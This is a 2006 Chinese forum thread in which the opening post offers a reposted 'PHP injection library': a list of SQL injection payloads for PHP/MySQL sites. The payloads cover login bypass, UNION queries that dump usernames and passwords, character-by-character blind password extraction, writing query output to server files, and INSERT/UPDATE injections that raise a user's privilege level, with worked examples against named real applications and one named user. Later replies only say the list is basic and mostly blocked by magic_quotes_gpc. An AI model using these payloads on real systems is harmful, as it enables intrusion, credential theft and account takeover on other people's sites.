〖原创〗推荐收藏:有史以来最强的PHP注射库

starshow0571

PHP注射库


' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
' and LENGTH(password)='6（探测密码长度）
' and LEFT(password,1)='m
' and LEFT(password,2)='my
..............................依次类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* （可以是1或者=后直接跟）
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt （导出文件）
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() （灵活应用查询）
常用查询测试语句，
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where &#39;b&#39; BETWEEN &#39;a&#39; AND &#39;c&#39;
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 （验证第一位密码）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 （第二位）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
..................................................................

例如2：灰色轨迹 变换id进行测试（meteor）
union%20(select%20allowsmilies,public,userid,&#39;0000-0-0&#39;,user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,&#39;0000-0-0&#39;,pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
构造语句：
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
union%20(select%201,0,2,&#39;1999-01-01&#39;,&#39;a&#39;,password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate
union%20(select%201,0,12695,&#39;1999-01-01&#39;,&#39;a&#39;,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate
union%20(select%201,0,12695,&#39;1999-01-01&#39;,&#39;a&#39;,userid%20FROM%20user%20where%20username=&#39;sandflee&#39;)%20order%20by%20eventdate （查沙子的id）


（select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)
select * FROM article where articleid=&#39;$id&#39; union select * FROM......（字段和数据库相同情况下，可直接提交）
select * FROM article where articleid=&#39;$id&#39; union select 1,1,1,1,1,1,1 FROM......（不同的情况下）

特殊技巧：在表单，搜索引擎等地方写：
"___"
".__ "
"%
%&#39; ORDER BY articleid/*
%&#39; ORDER BY articleid#
__&#39; ORDER BY articleid/*
__&#39; ORDER BY articleid#

$command = "dir c:\";system($command);
select * FROM article where articleid=&#39;$id&#39;
select * FROM article where articleid=$id
1&#39; and 1=2 union select * from user where userid=1/* 句中变为
(select * FROM article where articleid=&#39;1&#39; and 1=2 union select * from user where userid=1/*&#39;)
1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：
create DATABASE `injection`
create TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default &#39;&#39;,
`password` varchar(20) NOT NULL default &#39;&#39;,
PRIMARY KEY (`userid`)
) ;
insert INTO `user` VALUES (1, &#39;swap&#39;, &#39;mypass&#39;);


插如一个注册用户：
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES (&#39;&#39;, &#39;$username&#39;, &#39;$password&#39;, &#39;$homepage&#39;, &#39;1&#39;);
"insert INTO membres (login,password,nom,email,userlevel) VALUES (&#39;$login&#39;,&#39;$pass&#39;,&#39;$nom&#39;,&#39;$email&#39;,&#39;1&#39;)";
insert INTO membres (login,password,nom,email,userlevel) VALUES (&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;3&#39;)#&#39;,&#39;1&#39;)
"insert INTO membres SET login=&#39;$login&#39;,password=&#39;$pass&#39;,nom=&#39;$nom&#39;,email=&#39;$email&#39;";
insert INTO membres SET login=&#39;&#39;,password=&#39;&#39;,nom=&#39;&#39;,userlevel=&#39;3&#39;,email=&#39;&#39;
"insert INTO membres VALUES (&#39;$id&#39;,&#39;$login&#39;,&#39;$pass&#39;,&#39;$nom&#39;,&#39;$email&#39;,&#39;1&#39;)";

update user SET password=&#39;$password&#39;, homepage=&#39;$homepage&#39; where id=&#39;$id&#39;
update user SET password=&#39;MD5(mypass)&#39; where username=&#39;admin&#39;#)&#39;, homepage=&#39;$homepage&#39; where id=&#39;$id&#39;
"update membres SET password=&#39;$pass&#39;,nom=&#39;$nom&#39;,email=&#39;$email&#39; where id=&#39;$id&#39;";
update membres SET password=&#39;[PASS]&#39;,nom=&#39;&#39;,userlevel=&#39;3&#39;,email=&#39; &#39; where id=&#39;[ID]&#39;
"update news SET Votes=Votes+1, score=score+$note where idnews=&#39;$id&#39;";

长用函数：
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如：
update article SET title=$title where articleid=1 对应函数
update article SET title=DATABASE() where id=1
#把当前数据库名更新到title字段
update article SET title=USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SYSTEM_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=SESSION_USER() where id=1
#把当前 MySQL 用户名更新到title字段
update article SET title=CURRENT_USER() where id=1
#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
$req = "select * FROM membres where name like &#39;%$search%&#39; ORDER BY name";
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name
select uid FROM admins where login=&#39;&#39; OR &#39;a&#39;=&#39;a&#39; AND password=&#39;&#39; OR &#39;a&#39;=&#39;a&#39; （经典）
select uid FROM admins where login=&#39;&#39; OR admin_level=1#&#39; AND password=&#39;&#39;
select * FROM table where msg like &#39;%hop&#39;
select uid FROM membres where login=&#39;Bob&#39; AND password like &#39;a%&#39;#&#39; AND password=&#39;&#39;
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name [s:40]

笨笨啊

这个是注射吗？？…………只是基础的sql语法


[mop023]  [mop023]  [mop023]

笨笨啊

php相对于asp的安全性在哪里知道吗？因为php有一个独有的属性，而这个属性默认是开启的
这个属性就是magic_quotes_gpc
它基本上就杜绝了常规的注射

任何的特殊字符都会被系统自动替换。所以只能是对方故意修改配置将这个选项打开-_-#，我想没这么的人吧：）

另外，有一些系统倒有可能可以利用union来进行sql的执行

笨笨啊

基本上，上面带&#39;号的全是无效的：）

starshow0571

引用第3楼笨笨啊于2006-09-02 22:33发表的“”:
基本上，上面带&#39;号的全是无效的：）

不好意思!我不懂PHP的,只是知道和C很相似,有空会学习学习的,上面的文章是从我朋友的博客上转下来的!

糖果

[mop011]  [mop011]
全然听不懂在说什么 [s:43]

xclno1

看不懂啊
没想过在这方面发展的
也顶一下吧

starshow0571

有恒心的去学下,很快就入门的!

一头雾水

引用第1楼笨笨啊于2006-09-02 22:20发表的“”:
这个是注射吗？？…………只是基础的sql语法


[mop023]  [mop023]  [mop023]

真的

上帝叫杰拉德

好遥远啊 [mop004]